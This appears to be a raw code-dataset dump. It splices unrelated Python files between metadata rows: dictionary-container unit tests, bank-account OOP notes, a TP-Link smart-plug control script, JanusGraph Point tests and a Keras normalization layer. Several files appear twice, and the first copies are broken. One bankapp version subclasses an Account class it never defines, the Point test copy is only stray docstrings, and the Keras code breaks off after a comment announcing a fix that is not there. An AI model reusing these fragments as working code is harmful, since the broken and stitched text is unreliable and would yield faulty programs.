        instance = self.create({'b': 1, 'd': 2})
        with self.assertRaisesRegexp(KeyError, 'c'):
            result = instance['c']

    def test_Contains_KeyNotIn_ReturnFalse(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertNotIn('c', instance)

    def test_Contains_KeyIsIn_ReturnTrue(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertIn('b', instance)

    def test_HasKey_KeyNotIn_ReturnFalse(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertFalse(instance.has_key('c'))

    def test_HasKey_KeyIsIn_ReturnTrue(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertTrue(instance.has_key('b'))

    def test_Get_KeyFound_ReturnValueForGivenKey(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertEqual(1, instance.get('b'))

    def test_Get_KeyNotFoundAndDefaultNotGiven_ReturnNone(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertIsNone(instance.get('c'))

    def test_Get_KeyNotFoundAndDefaultWasGiven_ReturnDefault(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertEqual(2.4, instance.get('c', 2.4))

    def test_Items_Always_ReturnListOfKeyValuePaorsAs2Tuples(self):
        instance = self.create({'b': 1, 'd': 2})
        result = instance.items()
        self.assertEqual([('b', 1), ('d', 2)], list(result))

    def test_Values_Always_ReturnListOfValues(self):
        instance = self.create({'b': 1, 'd': 2})
        result = instance.values()
        self.assertEqual([1, 2], list(result))

    def test_Keys_Always_ReturnListOfKeys(self):
        instance = self.create({'b': 1, 'd': 2})
        result = instance.keys()
        self.assertEqual(['b', 'd'], list(result))

    def test_Keys_InitWitKeysInOrder_KeepKeysInGivenOrder(self):
        # FrozenDict is expected to preserve insertion order of keys.
        instance = self.create([('d', 1), ('b', 2), ('c', 3)])
        result = instance.keys()
        self.assertEqual(['d', 'b', 'c'], list(result))

    def test_Str_Always_IsDollarAndKeyValuePairsInBraces(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertEqual("${'b': 1, 'd': 2}", str(instance))

    def test_Equal_SameObject_ReturnTrue(self):
        instance = self.create({'b': 1, 'd': 2})
        self.assertEqual(instance, instance)

    def test_Equal_SameContent_ReturnTrue(self):
        a = self.create({'b': 1, 'd': 2})
        b = self.create({'d': 2, 'b': 1})
        self.assertEqual(a, b)

    def test_Equal_DifferentContent_ReturnFalse(self):
        a = self.create({'b': 1, 'd': 2})
        b = self.create({'d': 2, 'c': 1})
        self.assertNotEqual(a, b)

    def test_Equal_ToDictWithSameContent_ReturnTrue(self):
        a = self.create({'b': 1, 'd': 2})
        b = {'b': 1, 'd': 2}
        self.assertEqual(a, b)

    def test_Iter_Always_IterOverKeys(self):
        instance = self.create({'b': 1, 'd': 2})
        result = iter(instance)
        self.assertEqual('b', next(result))
        self.assertEqual('d', next(result))
        with self.assertRaises(StopIteration):
            next(result)

    def test_Hash_ForEqualInstances_AreEqual(self):
        a = self.create({'b': 1, 'd': 2})
        b = self.create({'d': 2, 'b': 1})
        self.assertEqual(hash(a), hash(b))

    def test_Hash_ForDifferentInstances_AreDifferent(self):
        a = self.create({'b': 1, 'd': 2})
        b = self.create({'d': 2, 'c': 1})
        self.assertNotEqual(hash(a), hash(b))

    def test_CastToDict_Always_DictContainsAllItemsFromFrozenDict(self):
        frozen = self.create({'b': 1, 'd': 2})
        result = dict(frozen)
        self.assertEqual({'b': 1, 'd': 2}, result)

    def test_Copy_Always_ReturnNewObject(self):
        frozen = self.create({'b': 1, 'd': 2})
        self.assertIsNot(frozen, frozen.copy())

    def test_Copy_Always_ReturnEqualObject(self):
        frozen = self.create({'b': 1, 'd': 2})
        self.assertEqual(frozen, frozen.copy())

    if six.PY2:
        # Python 2 only: the iter* trio mirrors the Python 2 dict API.
        def test_IterItems_Always_ReturnGeneratorOfKeyValuePairsAs2Tuples(self):
            instance = self.create({'b': 1, 'd': 2})
            result = instance.iteritems()
            self.assertEqual(('b', 1), next(result))
            self.assertEqual(('d', 2), next(result))
            with self.assertRaises(StopIteration):
                next(result)

        def test_IterValues_Always_ReturnGeneratorOfValues(self):
            instance = self.create({'b': 1, 'd': 2})
            result = instance.itervalues()
            self.assertEqual(1, next(result))
            self.assertEqual(2, next(result))
            with self.assertRaises(StopIteration):
                next(result)

        def test_IterKeys_Always_ReturnGeneratorOfKeys(self):
            instance = self.create({'b': 1, 'd': 2})
            result = instance.iterkeys()
            self.assertEqual('b', next(result))
            self.assertEqual('d', next(result))
            with self.assertRaises(StopIteration):
                next(result)

    @staticmethod
    def create(*args, **kwargs):
        # Single construction point so the class-under-test can be swapped.
        return dicttools.FrozenDict(*args, **kwargs)
class ChainMapTest(unittest.TestCase):
    """Tests for dicttools.ChainMap: a view over a sequence of dicts.

    Visible behaviour exercised below: lookups scan the maps in order and the
    first hit wins; __setitem__/__delitem__ operate on the first map already
    containing the key and raise KeyError otherwise; len() is the sum of the
    member lengths; iteration yields every key, duplicates included.
    """
    def test_GetItem_ItemInLastDict_ReturnValue(self):
        chain = self.create([
            {'a': 1, 'b': 2},
            {'c': 3, 'd': 4},
            {'e': 5, 'f': 6},
        ])
        self.assertEqual(6, chain['f'])
    def test_GetItem_ItemInFirstAndLastDict_ReturnValueFromFirst(self):
        chain = self.create([
            {'a': 1, 'b': 2},
            {'c': 3, 'd': 4},
            {'e': 5, 'a': 6},
        ])
        self.assertEqual(1, chain['a'])
    def test_GetItem_ItemNotInChain_Throws(self):
        chain = self.create([
            {'a': 1, 'b': 2},
            {'c': 3, 'd': 4},
            {'e': 5, 'f': 6},
        ])
        # NOTE(review): assertRaisesRegexp is a deprecated alias removed in
        # Python 3.12; prefer assertRaisesRegex once Py2 support is dropped.
        with self.assertRaisesRegexp(KeyError, 'g'):
            r = chain['g']
    def test_Get_ItemInChain_ReturnValue(self):
        chain = self.create([
            {'a': 1, 'b': 2},
            {'c': 3, 'd': 4},
            {'e': 5, 'f': 6},
        ])
        self.assertEqual(4, chain.get('d', -1))
    def test_Get_ItemNotInChain_ReturnValue(self):
        chain = self.create([
            {'a': 1, 'b': 2},
            {'c': 3, 'd': 4},
            {'e': 5, 'f': 6},
        ])
        self.assertEqual(-1, chain.get('x', -1))
    def test_SetItem_ItemInOneMap_ChangeValueInMap(self):
        chain = self.create([
            {'a': 1, 'b': 2},
            {'c': 3, 'd': 4},
            {'e': 5, 'f': 6},
        ])
        chain['d'] = 98
        self.assertEqual(98, chain['d'])
    def test_SetItem_ItemInManyMaps_ChangeValueInFirstFoundedMap(self):
        maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
        chain = self.create(maps)
        chain['a'] = 98
        # Only the first map holding 'a' is mutated; later maps keep theirs.
        self.assertEqual(98, maps[0]['a'])
        self.assertEqual(6, maps[-1]['a'])
    def test_SetItem_ItemNotInChain_Throws(self):
        maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
        chain = self.create(maps)
        with self.assertRaisesRegexp(KeyError, 'x'):
            chain['x'] = 98
    def test_DelItem_ItemInManyMaps_DeleteFirstFoundedItem(self):
        maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
        chain = self.create(maps)
        del chain['a']
        self.assertEqual(6, chain['a'])
    def test_DelItem_ItemNotInChain_Throws(self):
        maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
        chain = self.create(maps)
        with self.assertRaisesRegexp(KeyError, 'x'):
            del chain['x']
    def test_Len_Always_ReturnSumOfLengthOfMaps(self):
        maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
        chain = self.create(maps)
        self.assertEqual(6, len(chain))
    def test_Iter_Always_ReturnKeysGenerator(self):
        maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
        chain = self.create(maps)
        result = sorted(chain)
        # Duplicate key 'a' appears once per map that defines it.
        self.assertEqual(['a', 'a', 'b', 'c', 'd', 'e'], result)
    @staticmethod
    def create(maps):
        """Single construction point for the object under test (ChainMap)."""
        return dicttools.ChainMap(maps)
class TwoWayDictTest(unittest.TestCase):
    """Tests for dicttools.TwoWayDict: a bijective mapping.

    Visible behaviour exercised below: assigning d[k] = v also makes d[v]
    return k; len() counts both directions (so one pair contributes 2 unless
    key == value); reassigning a key or a value evicts the stale partner;
    deletion by either side removes the pair; values must be hashable.
    """
    def test_Init_GiveDictWith2UniqueValues_Contains4Elements(self):
        container = self.create({'alpha': 'beta', 'gamma': 'delta'})
        self.assertEqual(4, len(container))
    def test_Init_GiveDictWith1EqualKeyAndValue_Contains1Elements(self):
        container = self.create({'alpha': 'alpha'})
        self.assertEqual(1, len(container))
    def test_Init_GiveDictWithPairAndReversedPair_Contains2Elements(self):
        container = self.create({'alpha': 'beta', 'beta': 'alpha'})
        self.assertEqual(2, len(container))
    def test_Init_GiveDictWithNotHashableValue_Throws(self):
        # NOTE(review): assertRaisesRegexp is a deprecated alias removed in
        # Python 3.12; prefer assertRaisesRegex once Py2 support is dropped.
        with self.assertRaisesRegexp(TypeError, "unhashable type: 'list'"):
            container = self.create({'alpha': ['beta']})
    def test_SetItem_GetByKey_ReturnValue(self):
        container = self.create()
        container['alpha'] = 'omega'
        self.assertEqual('omega', container['alpha'])
    def test_SetItem_GetByValue_ReturnKey(self):
        container = self.create()
        container['alpha'] = 'omega'
        self.assertEqual('alpha', container['omega'])
    def test_GetItem_ItemNotFound_Throws(self):
        container = self.create()
        container['alpha'] = 'omega'
        with self.assertRaises(KeyError):
            value = container['delta']
    def test_Len_2ElementsAssigned_Return4(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['delta'] = 'beta'
        result = len(container)
        self.assertEqual(4, result)
    def test_SetItem_ReassignExistedKey_RemovePreviousValue(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['alpha'] = 'beta'
        # 'omega' lost its partner, so the reverse lookup must be gone too.
        with self.assertRaises(KeyError):
            value = container['omega']
    def test_SetItem_ReassignExistedValue_RemovePreviousKey(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['delta'] = 'omega'
        with self.assertRaises(KeyError):
            value = container['alpha']
    def test_SetItem_ReassignTheSameValue_Contains2Values(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['alpha'] = 'omega'
        self.assertEqual(2, len(container))
    def test_SetItem_ReassignReversed_Contains2Values(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['omega'] = 'alpha'
        self.assertEqual(2, len(container))
    def test_SetItem_AssignNotHashableElement_DoNotModify(self):
        container = self.create()
        container['alpha'] = 'omega'
        # A failed assignment must leave the existing pair untouched.
        with self.assertRaisesRegexp(TypeError, "unhashable type: 'list'"):
            container['delta'] = ['beta']
        self.assertEqual(2, len(container))
    def test_Iter_Always_IterByBothKeyAndValues(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['delta'] = 'beta'
        result = set(iter(container))
        self.assertEqual({'alpha', 'beta', 'delta', 'omega'}, result)
    def test_SetItem_ReassignEqualKeyAndValue_Contains1Values(self):
        container = self.create()
        container['alpha'] = 'alpha'
        container['alpha'] = 'alpha'
        self.assertEqual(1, len(container))
    def test_DelItem_DeleteKey_RemoveKeyAndValue(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['delta'] = 'beta'
        del container['delta']
        result = set(iter(container))
        self.assertEqual({'alpha', 'omega'}, result)
    def test_DelItem_DeleteValue_RemoveKeyAndValue(self):
        container = self.create()
        container['alpha'] = 'omega'
        container['delta'] = 'beta'
        del container['beta']
        result = set(iter(container))
        self.assertEqual({'alpha', 'omega'}, result)
    def test_DelItem_SameKeyAndValue_RemoveBoth(self):
        container = self.create()
        container['alpha'] = 'alpha'
        container['delta'] = 'beta'
        del container['alpha']
        result = set(iter(container))
        self.assertEqual({'delta', 'beta'}, result)
    def test_Str_OnePair_ReturnStringWithKeyValuesPairsAsSimpleDict(self):
        container = self.create()
        container['delta'] = 'beta'
        self.assertEqual("{'delta': 'beta', 'beta': 'delta'}", str(container))
    def test_Str_EqualKeyAndValue_Return1Value(self):
        container = self.create()
        container['alpha'] = 'alpha'
        self.assertEqual("{'alpha': 'alpha'}", str(container))
    def test_Repr_Always_ReturnStringWithOnlyDirectAssignment(self):
        container = self.create()
        container['delta'] = 'beta'
        self.assertEqual("TwoWayDict({'delta': 'beta'})", repr(container))
    @staticmethod
    def create(*args, **kwargs):
        """Single construction point for the object under test (TwoWayDict)."""
        return dicttools.TwoWayDict(*args, **kwargs)
| 12,627 | 2,062 | 69 |
e8cd785aee5009e5743f3d93753fd80c11d0befb | 3,653 | py | Python | bank_oop notes/bankapp.py | shadowp2810/python_GUI_BookShelf_DB_OOPv | 37567485ee2212fcfe755c963b7880bcff6e480c | [
"MIT"
] | null | null | null | bank_oop notes/bankapp.py | shadowp2810/python_GUI_BookShelf_DB_OOPv | 37567485ee2212fcfe755c963b7880bcff6e480c | [
"MIT"
] | null | null | null | bank_oop notes/bankapp.py | shadowp2810/python_GUI_BookShelf_DB_OOPv | 37567485ee2212fcfe755c963b7880bcff6e480c | [
"MIT"
] | null | null | null |
# Inheritance
class Checking( Account ): # We pass the base class as an argument for Checking class to inherit
"""This class generates checking account objects""" # doc strings to describe a class
type = "checking" # is a class variable. declared outside the methods of a class. shared by all instances of a class
#---------------------
account = Account( "importedFiles/balance.txt" ) # <account.bankapp.Account > Package, Module, Class
print( account )
print( "Current Balance: %s" %( account.balance ) )
# account.withdraw( 100 )
# account.deposit( 100 )
# print( "New Balance: %s" %( account.balance ) )
# account.commit()
#---------------------
# Inheritance
checking = Checking( "importedFiles/balance.txt" , 1 ) # `checking` is an object # has an atribute `fee`
print( checking )
print( "Current Balance: %s" %( checking.balance ) )
# checking.deposit(10)
# checking.transfer(100)
# checking.commit()
# print( "New Balance: %s" %( checking.balance ) )
#---------------------
# Inheritance class variable
# jacks_checking = Checking( "importedFiles/jack.txt" , 1 )
# jacks_checking.transfer(100)
# print( jacks_checking )
# print( "Current Balance for Jack: %s" %( jacks_checking.balance ) )
# jacks_checking.commit()
# print( jacks_checking.type )
# johns_checking = Checking( "importedFiles/john.txt" , 1 )
# johns_checking.transfer(100)
# print( johns_checking )
# print( "Current Balance for Jack: %s" %( johns_checking.balance ) )
# johns_checking.commit()
# print( johns_checking.type )
#---------------------
# Doc String
# print( johns_checking.__doc__) # doc strings to describe a class
#---------------------
# Data Members
# are instance variables or class variables
#---------------------
# Constructors
# are the __init__ functions or methods in a class and constructs the class
#---------------------
# Class Methods
# applied to the objects instance, eg transfer, deposit
#---------------------
# Instantiation
# is the process of creating object instances or instances of a class
# eg: johns_checking = Checking( "importedFiles/john.txt" , 1 )
#---------------------
# Inheritance
# is the process of creating a subclass. has methods of inherited class plus its own methods
#---------------------
# Attributes
# class and instance variables that can be accessed
# eg: # print( johns_checking.type ) where .type is an arttribute
# eg: # print( johns_checking.balance ) where .balance is an arttribute
class Account:
    """A bank account whose balance is persisted in a plain text file."""

    def __init__(self, filepath):
        # Remember the backing file so commit() can write the balance back.
        self.filepath = filepath
        with open(filepath, 'r') as fh:
            self.balance = int(fh.read())

    def withdraw(self, amount):
        """Subtract amount from the in-memory balance (not persisted)."""
        self.balance -= amount

    def deposit(self, amount):
        """Add amount to the in-memory balance (not persisted)."""
        self.balance += amount

    def commit(self):
        """Write the current in-memory balance back to the backing file."""
        with open(self.filepath, 'w') as fh:
            fh.write(str(self.balance))


# Inheritance: Checking extends Account with a per-transfer fee.
class Checking(Account):
    """This class generates checking account objects"""

    type = "checking"  # class variable shared by all Checking instances

    def __init__(self, filepath, fee):
        Account.__init__(self, filepath)
        self.fee = fee

    def transfer(self, amount):
        # A transfer costs the amount moved plus the fixed fee.
        self.balance -= amount + self.fee
#---------------------
account = Account( "importedFiles/balance.txt" ) # <account.bankapp.Account > Package, Module, Class
print( account )
print( "Current Balance: %s" %( account.balance ) )
# account.withdraw( 100 )
# account.deposit( 100 )
# print( "New Balance: %s" %( account.balance ) )
# account.commit()
#---------------------
# Inheritance
checking = Checking( "importedFiles/balance.txt" , 1 ) # `checking` is an object # has an atribute `fee`
print( checking )
print( "Current Balance: %s" %( checking.balance ) )
# checking.deposit(10)
# checking.transfer(100)
# checking.commit()
# print( "New Balance: %s" %( checking.balance ) )
#---------------------
# Inheritance class variable
# jacks_checking = Checking( "importedFiles/jack.txt" , 1 )
# jacks_checking.transfer(100)
# print( jacks_checking )
# print( "Current Balance for Jack: %s" %( jacks_checking.balance ) )
# jacks_checking.commit()
# print( jacks_checking.type )
# johns_checking = Checking( "importedFiles/john.txt" , 1 )
# johns_checking.transfer(100)
# print( johns_checking )
# print( "Current Balance for Jack: %s" %( johns_checking.balance ) )
# johns_checking.commit()
# print( johns_checking.type )
#---------------------
# Doc String
# print( johns_checking.__doc__) # doc strings to describe a class
#---------------------
# Data Members
# are instance variables or class variables
#---------------------
# Constructors
# are the __init__ functions or methods in a class and constructs the class
#---------------------
# Class Methods
# applied to the objects instance, eg transfer, deposit
#---------------------
# Instantiation
# is the process of creating object instances or instances of a class
# eg: johns_checking = Checking( "importedFiles/john.txt" , 1 )
#---------------------
# Inheritance
# is the process of creating a subclass. has methods of inherited class plus its own methods
#---------------------
# Attributes
# class and instance variables that can be accessed
# eg: # print( johns_checking.type ) where .type is an attribute
# eg: # print( johns_checking.balance ) where .balance is an attribute
| 842 | 85 | 226 |
6b2bf4081d40274e7e0f8d92546a36c652f943b5 | 923 | py | Python | tpplug.py | czirakim/SMSalert.shutdown.PI | 07a23259c77c6b24b18e18c16d8b0ea0db1b07ae | [
"MIT"
] | null | null | null | tpplug.py | czirakim/SMSalert.shutdown.PI | 07a23259c77c6b24b18e18c16d8b0ea0db1b07ae | [
"MIT"
] | null | null | null | tpplug.py | czirakim/SMSalert.shutdown.PI | 07a23259c77c6b24b18e18c16d8b0ea0db1b07ae | [
"MIT"
] | null | null | null | import socket
from struct import pack
ip='192.168.8.211'
port='9999'
commands = {'on' : '{"system":{"set_relay_state":{"state":1}}}',
'off' : '{"system":{"set_relay_state":{"state":0}}}',
'info' : '{"system":{"get_sysinfo":{}}}'}
| 23.666667 | 70 | 0.56338 | import socket
from struct import pack
ip='192.168.8.211'
port='9999'
commands = {'on' : '{"system":{"set_relay_state":{"state":1}}}',
'off' : '{"system":{"set_relay_state":{"state":0}}}',
'info' : '{"system":{"get_sysinfo":{}}}'}
def encrypt(string):
    """XOR-autokey-cipher *string* (TP-Link smart plug scheme) and prepend
    a big-endian 4-byte length header."""
    key = 171  # fixed initial key; each ciphertext byte keys the next one
    payload = bytearray()
    for ch in string:
        key ^= ord(ch)
        payload.append(key)
    return pack(">I", len(string)) + bytes(payload)
def decrypt(string):
    """Invert encrypt()'s XOR autokey cipher.

    *string* is the raw ciphertext bytes WITHOUT the 4-byte length header.
    """
    key = 171
    chars = []
    for byte in string:
        chars.append(chr(key ^ byte))
        key = byte  # the ciphertext byte is the key for the next byte
    return "".join(chars)
def send_cmd(string):
    """Send the named command ('on', 'off' or 'info') to the plug at ip:port
    and return the decrypted JSON reply as a string.

    Fix: the original leaked the socket when connect/send/recv raised; the
    context manager guarantees close() on every exit path (Python 3 sockets
    support the with-statement).
    """
    cmd = commands[string]
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock_tcp:
        sock_tcp.settimeout(10)
        sock_tcp.connect((ip, int(port)))
        sock_tcp.send(encrypt(cmd))
        data = sock_tcp.recv(2048)
    # The first 4 bytes are the plaintext length header added by encrypt().
    return decrypt(data[4:])
| 583 | 0 | 69 |
6f5d3626cd1240dab8cb9ad41e0c04bd8af7f78b | 2,490 | py | Python | src/unittest/python/core/datatypes/Point_test.py | debasishdebs/janusgraph-py | c827e56e0dd175bad9324e2835516a4d4e92d47d | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-09-11T16:46:55.000Z | 2020-05-22T01:04:23.000Z | src/unittest/python/core/datatypes/Point_test.py | debasishdebs/janusgraph-py | c827e56e0dd175bad9324e2835516a4d4e92d47d | [
"ECL-2.0",
"Apache-2.0"
] | 14 | 2018-09-09T19:37:40.000Z | 2019-05-07T22:05:26.000Z | src/unittest/python/core/datatypes/Point_test.py | debasishdebs/janusgraph-py | c827e56e0dd175bad9324e2835516a4d4e92d47d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2018 JanusGraph Python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from janusgraph_python.core.datatypes.GeoShape import GeoShape
class TestPoint(unittest.TestCase):
"""
This method is used to unit test when Invalid coordinates are passed to Point class.
"""
"""
This method is used to unit test when Valid coordinates are passed to Point class.
"""
"""
This method is used to unit test equality and non equality of 2 Point classes defined by __eq__ and __ne__ methods.
"""
"""
This method is used to unit test, once Point objects are created, it can return valid and correct coordinates.
"""
"""
This method is used to unit test the Shape of Object being created.
"""
| 27.977528 | 120 | 0.661044 | # Copyright 2018 JanusGraph Python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from janusgraph_python.core.datatypes.GeoShape import GeoShape
class TestPoint(unittest.TestCase):
    """Unit tests for GeoShape.Point: construction, equality and accessors.

    Fix: the original placed the per-test descriptions as free-floating
    triple-quoted strings *between* methods — dead expression statements not
    attached to anything and invisible to ``__doc__``/test runners. They are
    now real method docstrings, and the redundant trailing ``pass``
    statements are removed. Assertions are unchanged.
    """

    def setUp(self):
        self.latitude = 85.9
        self.longitude = 171.2
        # Note the constructor argument order: (longitude, latitude).
        self.point = GeoShape.Point(self.longitude, self.latitude)

    def test_invalid_point(self):
        """Out-of-range coordinates are rejected with ValueError."""
        latitude = 95.9
        longitude = 181.2
        with self.assertRaises(ValueError):
            GeoShape.Point(longitude, latitude)

    def test_valid_point(self):
        """toString() renders the point as POINT(lat: ..., lon: ...)."""
        pt = self.point
        point_representation = "POINT(lat: {}, lon: {})".format(self.latitude, self.longitude)
        assert point_representation == pt.toString()

    def test_point_equality(self):
        """__eq__/__ne__ compare points by coordinates, not identity."""
        lat1 = 80.1
        lon1 = 160.2
        p1 = self.point
        p2 = self.point
        p3 = GeoShape.Point(lon1, lat1)
        self.assertEqual(p1, p2)
        self.assertNotEqual(p1, p3)

    def test_coordinate_retrival(self):
        """Accessors return exactly the coordinates the point was built with."""
        p1 = self.point
        self.assertEqual(self.latitude, p1.getLatitude())
        self.assertEqual(self.longitude, p1.getLongitude())
        self.assertEqual([self.latitude, self.longitude], p1.getCoordinates())

    def test_shape(self):
        """getShape() identifies the object as a POINT."""
        p1 = self.point
        self.assertEqual("POINT", p1.getShape())
| 1,054 | 0 | 157 |
7c1d89c0c37fde16450073c78e9c7335060bddd7 | 4,991 | py | Python | drugresnet/seya/layers/imageproc.py | Naghipourfar/CCLE | cd557928a003200c683861b29c607942029bffb1 | [
"MIT"
] | 429 | 2015-08-11T09:48:34.000Z | 2021-07-31T15:13:23.000Z | drugresnet/seya/layers/imageproc.py | Naghipourfar/CCLE | cd557928a003200c683861b29c607942029bffb1 | [
"MIT"
] | 55 | 2015-09-10T11:57:58.000Z | 2021-04-24T14:13:31.000Z | drugresnet/seya/layers/imageproc.py | Naghipourfar/CCLE | cd557928a003200c683861b29c607942029bffb1 | [
"MIT"
] | 135 | 2015-08-31T17:52:26.000Z | 2022-02-07T05:31:12.000Z | """Note: this code was modified from:
https://github.com/lpigou/Theano-3D-ConvNet/blob/master/LICENSE
by @lpigou and collaborators
"""
import numpy as np
import theano.tensor as T
import keras.backend as K
from keras.layers.core import Layer
class NormLayer(Layer):
""" Normalization layer """
def __init__(self, method="lcn", kernel_size=9, threshold=1e-4,
nb_channels=3,
use_divisor=True, **kwargs):
"""
method: "lcn", "gcn", "mean"
LCN: local contrast normalization
kwargs:
kernel_size=9, threshold=1e-4, use_divisor=True
GCN: global contrast normalization
kwargs:
scale=1., subtract_mean=True, use_std=False, sqrt_bias=0.,
min_divisor=1e-8
MEAN: local mean subtraction
kwargs:
kernel_size=5
"""
super(NormLayer, self).__init__(**kwargs)
self.method = method
self.kernel_size = kernel_size
self.threshold = threshold
self.use_divisor = use_divisor
self.nb_channels = nb_channels
self.input = K.placeholder(ndim=4)
def lecun_lcn(self, X, kernel_size=7, threshold=1e-4, use_divisor=True):
"""
Yann LeCun's local contrast normalization
Orginal code in Theano by: Guillaume Desjardins
"""
filter_shape = (1, 1, kernel_size, kernel_size)
filters = self.gaussian_filter(
kernel_size).reshape(filter_shape)
# filters = shared(_asarray(filters, dtype=floatX), borrow=True)
filters = K.variable(filters)
convout = K.conv2d(X, filters, filter_shape=filter_shape,
border_mode='same')
# For each pixel, remove mean of kernel_sizexkernel_size neighborhood
new_X = X - convout
if use_divisor:
# Scale down norm of kernel_sizexkernel_size patch
sum_sqr_XX = K.conv2d(K.pow(K.abs(new_X), 2), filters,
filter_shape=filter_shape, border_mode='same')
denom = T.sqrt(sum_sqr_XX)
per_img_mean = denom.mean(axis=[2, 3])
divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)
divisor = T.maximum(divisor, threshold)
new_X /= divisor
return new_X
| 33.722973 | 83 | 0.559407 | """Note: this code was modified from:
https://github.com/lpigou/Theano-3D-ConvNet/blob/master/LICENSE
by @lpigou and collaborators
"""
import numpy as np
import theano.tensor as T
import keras.backend as K
from keras.layers.core import Layer
class NormLayer(Layer):
    """Normalization layer for 4D image batches (samples, channels, rows, cols).

    Supports three methods selected at construction time:
    LCN (local contrast normalization), GCN (global contrast normalization)
    and local mean subtraction.
    """

    def __init__(self, method="lcn", kernel_size=9, threshold=1e-4,
                 nb_channels=3,
                 use_divisor=True, **kwargs):
        """
        method: "lcn", "gcn", "mean"
        LCN: local contrast normalization
            kwargs:
                kernel_size=9, threshold=1e-4, use_divisor=True
        GCN: global contrast normalization
            kwargs:
                scale=1., subtract_mean=True, use_std=False, sqrt_bias=0.,
                min_divisor=1e-8
        MEAN: local mean subtraction
            kwargs:
                kernel_size=5
        """
        super(NormLayer, self).__init__(**kwargs)
        self.method = method
        self.kernel_size = kernel_size
        self.threshold = threshold
        self.use_divisor = use_divisor
        self.nb_channels = nb_channels
        self.input = K.placeholder(ndim=4)

    def get_output(self, train=False):
        """Dispatch the layer input to the configured normalization method."""
        X = self.get_input()
        out = []

        if self.method == "lcn":
            # LCN operates per channel: normalize each channel slice
            # independently, then re-concatenate along the channel axis.
            for i in range(self.nb_channels):
                XX = X[:, i:i+1, :, :]
                out += [self.lecun_lcn(XX, self.kernel_size, self.threshold,
                                       self.use_divisor)]
            out = K.concatenate(out, axis=1)
        elif self.method == "gcn":
            out = self.global_contrast_normalize(X)
        elif self.method == "mean":
            out = self.local_mean_subtraction(X, self.kernel_size)
        else:
            raise NotImplementedError()

        return out

    def lecun_lcn(self, X, kernel_size=7, threshold=1e-4, use_divisor=True):
        """
        Yann LeCun's local contrast normalization
        Orginal code in Theano by: Guillaume Desjardins

        Subtracts a Gaussian-weighted local mean from every pixel and, if
        use_divisor, divides by the local standard deviation (clamped by
        `threshold` and by the per-image mean so flat regions don't blow up).
        """
        filter_shape = (1, 1, kernel_size, kernel_size)
        filters = self.gaussian_filter(kernel_size).reshape(filter_shape)
        filters = K.variable(filters)

        convout = K.conv2d(X, filters, filter_shape=filter_shape,
                           border_mode='same')

        # For each pixel, remove mean of kernel_size x kernel_size neighborhood
        new_X = X - convout

        if use_divisor:
            # Scale down norm of kernel_size x kernel_size patch
            sum_sqr_XX = K.conv2d(K.pow(K.abs(new_X), 2), filters,
                                  filter_shape=filter_shape, border_mode='same')

            denom = T.sqrt(sum_sqr_XX)
            per_img_mean = denom.mean(axis=[2, 3])
            divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)
            divisor = T.maximum(divisor, threshold)

            new_X /= divisor

        return new_X

    def local_mean_subtraction(self, X, kernel_size=5):
        """Subtract the unweighted local mean (box filter) from every pixel."""
        filter_shape = (1, 1, kernel_size, kernel_size)
        filters = self.mean_filter(kernel_size).reshape(filter_shape)
        filters = K.variable(filters)

        mean = K.conv2d(X, filters, filter_shape=filter_shape,
                        border_mode='same')
        return X - mean

    def global_contrast_normalize(self, X, scale=1., subtract_mean=True,
                                  use_std=False, sqrt_bias=0., min_divisor=1e-6):
        """Normalize each feature row of X to zero mean and fixed norm/std.

        Accepts 3D or 4D tensors; statistics are taken along the last axis.
        """
        ndim = X.ndim
        if ndim not in [3, 4]:
            raise NotImplementedError("X.dim>4 or X.ndim<3")

        scale = float(scale)
        mean = X.mean(axis=ndim-1)
        new_X = X.copy()

        if subtract_mean:
            if ndim == 3:
                new_X = X - mean[:, :, None]
            else:
                new_X = X - mean[:, :, :, None]

        if use_std:
            normalizers = T.sqrt(sqrt_bias + X.var(axis=ndim-1)) / scale
        else:
            normalizers = T.sqrt(sqrt_bias + (new_X ** 2).sum(axis=ndim-1)) / scale

        # Don't normalize by anything too small.
        # BUG FIX: T.set_subtensor is functional — it returns a new variable
        # and leaves its input untouched. The original discarded the result,
        # so the min_divisor clamp silently had no effect.
